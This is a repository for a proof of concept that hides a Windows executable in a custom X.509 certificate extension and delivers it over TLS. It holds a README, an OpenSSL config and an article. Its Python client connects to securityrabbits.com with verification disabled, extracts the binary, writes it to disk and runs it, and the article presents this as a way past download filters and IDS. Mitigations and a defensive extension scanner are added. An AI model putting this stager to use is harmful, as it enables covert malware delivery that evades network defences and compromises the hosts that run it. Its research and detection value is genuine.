├── README.md
├── EXEfromCER.py
├── srkey.pem
├── srcert.pem
├── cert.ini
└── Article.md

/README.md:
--------------------------------------------------------------------------------
# EXEfromCER
This is a proof of concept to deliver a binary payload via an X.509 TLS certificate.
It embeds a full Windows executable inside a custom extension of an X.509 certificate and serves it via HTTPS. The client extracts the payload from the certificate and executes it.

1. Generate a certificate with a custom OID extension containing your binary: `openssl req -new -x509 -days 365 -config cert.ini -keyout srkey.pem -out srcert.pem -nodes`
2. Serve it over TLS (e.g., with OpenSSL).
3. The Python client (`EXEfromCER.py`) connects to the SSL server, extracts the binary, writes it to disk, and runs it.

--------------------------------------------------------------------------------
/EXEfromCER.py:
--------------------------------------------------------------------------------
import subprocess
import ssl, socket
from cryptography import x509
from cryptography.hazmat.backends import default_backend

print("Getting SSL certificate from SecurityRabbits.com...")
hostname = 'securityrabbits.com'
# Certificate verification is disabled so the self-signed srcert.pem is accepted.
ctx = ssl._create_unverified_context()
with ctx.wrap_socket(socket.socket(), server_hostname=hostname) as s:
    s.connect((hostname, 4443))
    # Fetch the server certificate in DER form and parse it.
    cert_der = s.getpeercert(binary_form=True)
    cert = x509.load_der_x509_certificate(cert_der, backend=default_backend())
    # The custom extension's OCTET STRING holds the raw executable bytes.
    payload = cert.extensions.get_extension_for_oid(x509.ObjectIdentifier("1.2.3.4.5.6")).value.value
    with open("securityrabbits.exe", "wb") as f:
        f.write(payload)

print("SecurityRabbits.exe is ready.\nRunning...\n")
subprocess.run(["SecurityRabbits.exe"])

--------------------------------------------------------------------------------
/srkey.pem:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/srcert.pem:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/cert.ini:
--------------------------------------------------------------------------------
[ req ]
distinguished_name = dn
x509_extensions = ext
prompt = no

[ dn ]
CN = securityrabbits.com

[ ext ]
1.2.3.4.5.6=DER:<hex-encoded executable>
--------------------------------------------------------------------------------
/Article.md:
--------------------------------------------------------------------------------
# Payloads Over TLS: Smuggling Executables Inside X.509 Certificates

## Introduction

Transport Layer Security (TLS) is widely used to protect the confidentiality and integrity of network traffic. But what if the very mechanism designed to secure traffic could be used to **deliver a payload**?
This proof of concept (PoC) demonstrates how an attacker can embed a full Windows executable inside an X.509 certificate extension and deliver it over HTTPS. Once the client connects and retrieves the certificate, it can extract and execute the binary locally.
No traditional download. No HTTP request. Just **certificate data**.

To the best of my knowledge, this technique of embedding and extracting a full binary payload from an X.509 certificate extension has not been publicly demonstrated before. If similar research or PoCs exist, I would appreciate references or contact.
==> https://www.extrahop.com/blog/stop-ssl-tls-exfil does exactly this since 2018

---

## The Concept

1. **Create a benign-looking certificate**
   * Embed a binary payload (e.g., a PE executable) in a custom extension
   * Use OpenSSL to generate the certificate
2. **Serve the certificate over HTTPS**
   * Use a TLS server with the custom certificate (e.g., `openssl s_server`)
3. **Extract the binary on the client**
   * Use a Python script to connect, retrieve the certificate, extract the payload, and run it
4. **(Optional)** If an outbound proxy **does not perform SSL inspection**, the payload reaches the client untouched.

---

## How It Works

### Certificate Extension

We use OpenSSL with a custom config:

```ini
[ req ]
distinguished_name = dn
x509_extensions = ext
prompt = no

[ dn ]
CN = securityrabbits.com

[ ext ]
1.2.3.4.5.6=DER:<hex-encoded executable>
```

Here, the executable is converted to a hexadecimal string and placed in a custom extension identified by an arbitrary OID (e.g., `1.2.3.4.5.6`).

---

## Client Extraction Script (Python)

```python
import subprocess
import ssl, socket
from cryptography import x509
from cryptography.hazmat.backends import default_backend

print("Getting SSL certificate from SecurityRabbits.com...")
hostname = 'securityrabbits.com'
# Certificate verification is disabled so the self-signed srcert.pem is accepted.
ctx = ssl._create_unverified_context()
with ctx.wrap_socket(socket.socket(), server_hostname=hostname) as s:
    s.connect((hostname, 4443))
    # Fetch the server certificate in DER form and parse it.
    cert_der = s.getpeercert(binary_form=True)
    cert = x509.load_der_x509_certificate(cert_der, backend=default_backend())
    # The custom extension's OCTET STRING holds the raw executable bytes.
    payload = cert.extensions.get_extension_for_oid(x509.ObjectIdentifier("1.2.3.4.5.6")).value.value
    with open("securityrabbits.exe", "wb") as f:
        f.write(payload)

print("SecurityRabbits.exe is ready.\nRunning...\n")
subprocess.run(["SecurityRabbits.exe"])
```

---

## Why It Matters

* **Bypasses traditional download filters**: There’s no HTTP GET, no `.exe` URL, and nothing obvious to block.
* **Evasive**: Most IDS/IPS, proxies, and firewalls do not deeply parse certificate fields.
* **Portable**: This can be adapted to other formats (e.g., PEM) or platforms.

---

## Mitigations

* **TLS inspection (MITM)**: Proxies that inspect and re-sign TLS traffic typically strip custom extensions.
* **Certificate parsing rules**: Security tools should flag unusual or oversized X.509 extensions.
* **Payload detection**: Endpoint detection should still flag and block unexpected binaries.
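A defensive counterpart to the certificate-parsing mitigation above, added here as an example and not part of the original repository: a dependency-free DER walker that reports any certificate extension with an unknown OID, an oversized value (the 1 KiB threshold is an assumption), or a value beginning with the MZ header. It runs on a constructed Extensions block; the same function accepts a whole certificate in DER form.

```python
# Extension OIDs a typical server certificate carries (key ids, key usage, SAN, basic constraints, CRL DP, policies, EKU, AIA).
KNOWN_OIDS = {"2.5.29.14", "2.5.29.15", "2.5.29.17", "2.5.29.19", "2.5.29.31",
              "2.5.29.32", "2.5.29.35", "2.5.29.37", "1.3.6.1.5.5.7.1.1"}
MAX_EXT_LEN = 1024   # assumed threshold: ordinary extension values stay far below 1 KiB

def _tlv(buf, pos):
    """Decode one DER TLV at buf[pos]; return (tag, value bytes, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: low bits give the byte count of the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def _oid_text(raw):
    """Dotted-decimal OID from content bytes: first byte packs two arcs, the rest are base-128."""
    arcs, value = [str(raw[0] // 40), str(raw[0] % 40)], 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(str(value))
            value = 0
    return ".".join(arcs)

def find_suspicious_extensions(der):
    """Walk a DER blob (a whole certificate works) and report each Extension, i.e. a SEQUENCE
    { OID, [BOOLEAN critical], OCTET STRING }, that is unknown, oversized or starts with MZ.
    Returns a list of (oid, value length, reasons)."""
    findings = []
    def walk(buf):
        pos = 0
        while pos < len(buf):
            tag, val, pos = _tlv(buf, pos)
            if tag not in (0x30, 0x31) and (tag & 0xE0) != 0xA0:
                continue                    # primitive (INTEGER, BIT STRING, ...): nothing nested
            kids, p = [], 0
            while p < len(val):
                t, v, p = _tlv(val, p)
                kids.append((t, v))
            if len(kids) >= 2 and kids[0][0] == 0x06 and kids[-1][0] == 0x04:
                oid, body = _oid_text(kids[0][1]), kids[-1][1]
                checks = [("unknown OID", oid not in KNOWN_OIDS),
                          (f"oversized ({len(body)} bytes)", len(body) > MAX_EXT_LEN),
                          ("PE header in value", body.startswith(b"MZ"))]   # DOS/PE magic
                reasons = [msg for msg, hit in checks if hit]
                if reasons:
                    findings.append((oid, len(body), reasons))
            walk(val)                       # SEQUENCE / SET / [n]: recurse into the children
    walk(der)
    return findings

def _enc(tag, content):
    """Sample-building helper: one DER TLV with a short or two-byte long-form length (n < 65536)."""
    n = len(content)
    return bytes([tag]) + (bytes([n]) if n < 0x80 else bytes([0x82, n >> 8, n & 0xFF])) + content

# Constructed sample ([3] EXPLICIT Extensions): critical basicConstraints (OID 2.5.29.19)
# beside a private OID 1.2.3.4.5.6 whose OCTET STRING is a 5000-byte MZ-prefixed blob.
SAMPLE_EXTENSIONS = _enc(0xA3, _enc(0x30,
    _enc(0x30, b"\x06\x03\x55\x1d\x13\x01\x01\xff\x04\x02\x30\x00")
    + _enc(0x30, b"\x06\x05\x2a\x03\x04\x05\x06" + _enc(0x04, b"MZ\x90\x00" + b"\x00" * 4996))))
```

To check a real certificate, pass the function its DER bytes, for example `ssl.PEM_cert_to_DER_cert(open("srcert.pem").read())` from the standard library.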

---

## Limitations

* Size is capped (~64 KB, depending on the TLS stack)
* Client must parse and extract the payload
* May not work against all servers/clients due to extension parsing differences

---

## Source Code

Full source is available on GitHub:
**[https://github.com/jeanlucdupont/EXEfromCER](https://github.com/jeanlucdupont/EXEfromCER)**

---

## Conclusion

Certificates are usually seen as static and boring. But they can become a **covert channel** for data exfiltration, payload delivery, or even steganography. This PoC is a reminder: **don’t trust blindly just because it’s wrapped in TLS.**
--------------------------------------------------------------------------------